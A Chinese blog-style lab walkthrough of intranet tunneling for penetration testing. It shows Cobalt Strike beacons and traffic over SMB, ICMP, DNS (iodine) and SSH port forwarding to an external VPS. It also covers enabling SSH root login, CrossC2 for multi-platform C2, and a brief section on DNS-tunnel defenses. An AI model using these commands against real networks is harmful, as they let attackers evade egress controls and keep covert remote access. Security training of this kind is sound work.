文章目录

  • SMB隧道&通讯&上线
  • ICMP隧道&通讯&上线
  • DNS隧道&通讯&上线
    • 1、上线环境:内网主机只出网DNS协议数据,解决上线
    • 2、通讯环境:
      • windows 演示
      • linux演示
  • SSH隧道&通讯
    • 防御DNS隧道攻击的方法
  • 控制上线-插件-Linux&Mac&IOS&Android
  • 参考:

CS不支持linux主机上线


这里禁用了所有tcp端口,依旧可以ping通,以及dns解析成功

SMB隧道&通讯&上线

判断:445通讯
通过端口扫描是否开放445端口进行判断
上线:借助通讯后绑定上线 详见往期文章
通讯:直接SMB协议通讯即可

ICMP隧道&通讯&上线

判断:ping命令
能ping通说明可以使用icmp隧道
上线:见往期文章

通讯:其他项目(icmpsh icmptunnel)
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

DNS隧道&通讯&上线


判断:windows:nslookup linux:dig

1、上线环境:内网主机只出网DNS协议数据,解决上线

-域名申请及配置

-监听器创建及配置

-后门绑定监听器及生成

CS建立DNS隧道上线

mode dns-txt
sleep 0

2、通讯环境:

有些鸡肋
内网主机只出网DNS协议数据,解决通讯
判断出网:nslookup www.baidu.com

项目工具:https://github.com/yarrick/iodine
iodine/ˈaɪədaɪn/单词的意思就是碘 原子序数为 53,53 也是 DNS 服务对应的端口号

安装

yum install iodine   #centos
apt-get intall iodine #ubuntu

-服务器:设置密码xiaodi并创建虚拟IP及绑定域名指向 这里演示linux服务端,windows服务端下载地址 https://code.kryo.se/iodine/

iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD

sudo iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD
-f 在前台运行
-c 不检查传入请求的客户端 IP 地址
-P 客户端与服务端之间的连接密码
-D 调试级别,-D 表示第一级,-DD 表示第二级,依此类推
192.168.0.1 是自己自定义的局域网虚拟 IP 地址。

设置密码whgojp并创建虚拟IP及绑定域名指向

-客户端:连接密码whgojp并绑定域名指向

windows 演示

iodine -f -M 200 -P whgojp ns1.whgojp.top


直接放到靶机上执行会报错,windows客户端可以直接使用编译好的windows版本,同时需要安装TAP网卡驱动程序。也可以下载OpenVPN,安装时只选择TAP Virtual Ethernet Adapter,安装后服务器上就会多出一块“TAP-Wndows ADApter V9”的网卡

都能在对方电脑上安装程序了,还要这样大费周折

双方都新增了一个网卡(dns、TAP-9),从而建立了通道
ping不通是因为靶机上有防火墙

windows平台iodine建立DNS隧道连接

linux演示

未开防火墙

-尝试通讯尝试连接:
ssh kali@192.168.0.2
这里我尝试ssh连接,但是立即命令中断,可能是DNS配置问题

SSH隧道&通讯


判断:ssh连接
1、上线:
由于CS无SSH协议监听器配置,无法上线
2、通讯:
由于SSH协议存在于Linux系统,跳板机必须Linux

iptables -F /* 清除所有规则 /
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /允许包从22端口进入/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /允许从22端口进入的包返回/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT / 域名解析端口,一般不开 /
iptables -A INPUT -p udp --sport 53 -j ACCEPT / 域名解析端口,一般不开 /
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /允许本机访问本机/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /允许所有IP访问80端口/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /保存配置/
iptables -L / 显示iptables列表 */

开启ssh协议登录:

vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

本地:入站封
将本地访问 10.10.10.132的流量转发至公网vps 1234端口上

ssh -CfNg -R 1122:10.10.10.132:8080 root@47.94.130.xx
curl http://127.0.0.1:1122

SSH隧道流量转发远程vps-信息探针

远程:出站封
将本地访问10.10.10.132的流量转发至本地的1234的端口上

ssh -CfNg -L 1234:10.10.10.132:8080 root@10.10.10.146
curl http://127.0.0.1:1234

同上输入146密码,访问本地(146)1234端口,

防御DNS隧道攻击的方法

禁止网络中任何人向外部服务器发送DNS请求,只允许与受信任的DNS服务器通信。
虽然没有人会将TXT解析请求发送给DNS服务器,但是邮件服务器/网关会这样做,因此,可以将邮件服务器/网关列入白名单并阻止传入和传出流量中的TXT请求。
跟踪用户的DNS查询次数,如果达到阈值,就生成相应的报告

控制上线-插件-Linux&Mac&IOS&Android

项目:https://github.com/gloxec/CrossC2
面向Linux Mac IOS Android系统上线支持
1、插件使用
2、命令使用
使用参考:
https://gloxec.github.io/CrossC2/zh_cn/
1、下载对应版本加载器和CNA插件
2、上传加载器文件和本地加载CNA插件
3、修改CNA插件配置路径及上传Key文件
4、使用命令或插件绑定HTTPS监听器生成

使用CS4.7版本没有搭建成功

待续

安卓apk木马可以使用msf生成,不过只能在模拟器中成功上线

参考:

https://zhuanlan.zhihu.com/p/379021936
https://www.cnblogs.com/micr067/p/12263337.html

【内网安全】隧道技术SSHDNSICMPSMB上线通讯LinuxMac相关推荐

  1. 【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议

    前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...

  2. 内网安全-隧道技术-防火墙限制协议绕过-文件传输

    隧道技术: 一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装. 传输和解包在内的全过程.使用隧道传递的数据(或负载)可以是不同协议的数据帧或包. 封装: 隧道协议将这些其他协议的数据 ...

  3. 内网安全——代理技术Socks5网络通讯控制上线

    目录 (一)前置知识 0x01 单机--防火墙之限制出入站 常见主机配置不出网的方式

  4. 【引用】内网安全数据保密技术分析与比较

    内网安全数据保密技术分析与比较 邹翔① 王志海②,李志涛② (①公安部第三研究所上海 200031: ②北京明朝万达科技有限公司,北京 100000) [摘要]本文通过对目前主要的内网安全数据保密关键 ...

  5. 通过路由器搭建内网穿透隧道

    通过路由器搭建内网穿透隧道 将本台计算机设置为一台服务器 控制面板中选择程序和功能,启用或关闭WINDOWS功能 选择左边启用或关闭 Windows 功能,勾选 Internet Informatio ...

  6. 【全过程记录】将windows电脑连接到ipad的rd client远程桌面,通过路由器搭建内网穿透隧道

    caiyi 2021/10/03 通过路由器搭建内网穿透隧道 将本台计算机设置为一台服务器 文章目录 一.找到内网ip 二.找到端口号 三.在ipad上同一局域网下连接 四.在不同局域网下连接 五.突 ...

  7. 【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)

    目录 一.准备 1.意义: 2.项目: 二.内网穿透 1.简介: 三.Ngrok(入门上线) 1.简述: 2.Ngrok入门上线(国版二开) 3.相关工具: 2.Ngrok入门上线(美版) 一.准备 ...

  8. 【内网安全-隧道搭建】内网穿透_Frp上线、测试

    目录 Frp(简易上线) 1.简述: 2.工具: 3.使用: 1.准备: 2.服务端(公网): 2.客户端(内网): 3.测试方法: 4.生成后门木马监听: Frp(简易上线) 1.简述: 1)Frp ...

  9. 内网穿透的技术解决方案

    1.NAT地址转换,解决的是IPV4地址不够用的问题: [硬核]公网访问?内网穿透!零经验上手!_哔哩哔哩_bilibili 2. 公网向内网发送数据的问题如何解决? 设置端口转发 3.多层NAT,解 ...

最新文章

  1. python生日贺卡制作以及细节问题的解决最后把python项目发布为exe可执行程序过程
  2. [导入]ASP.NET MVC的WebSite模式(with mvc membership)
  3. java记录目录树_Java记录
  4. 洛谷P1605:迷宫(DFS)
  5. python输入数字是什么类型的游戏_“数字炸弹”——一个练习Python基础知识的小游戏...
  6. 简单系统U盘制作 / 安装系统
  7. 第十周 项目一(4)哈夫曼编码的算法验证
  8. 邮件合并的逆向应用,从多个Word文档中取值到Excel中
  9. 【锁屏】 Ubuntu20.04 锁屏快捷键无反应的解决方法
  10. SANGFOR SCSA——协议基础
  11. svg文件上传公众号生成微信链接
  12. 26个数据分析案例——第二站:基于Hive的民航客户价值分析
  13. 微信小程序点击弹出输入框
  14. js之for in循环遍历对象(包括输出value值为什么是obj[k]而不是obj.k)
  15. 愉快复习马克思主义与当代
  16. 智慧城市篇 | 数字孪生智慧排水管网管理平台
  17. 我爱赚钱吧:学生都可以做的兼职工作
  18. android手机blhx素材提取
  19. 猫的计算机相关的网络语言,辟谣:猫咪的语言是喵?教你读懂“猫言猫语”,让你明白猫的内心...
  20. 【QtScrcpy】开源的投屏控制软件 - 安利

热门文章

  1. 键盘忍者:在隐藏的工具栏上使用StumbleUpon
  2. 青龙面板之酷狗大字版
  3. Apk 极限压缩(说点不一样的)
  4. php计算指定日期之间的天数,php计算任意两个日期之间的天数
  5. Beanutils造成dubbo反序列化失败?
  6. 程序员慎买日版的笔记本和键盘
  7. Android 获取扫码枪的扫描内容
  8. ijkplayer初始化流程
  9. Unity3d C#开发微信小游戏音频/音效播放问题解决过程分享
  10. 微信3D小游戏系列一:在微信小游戏中使用threejs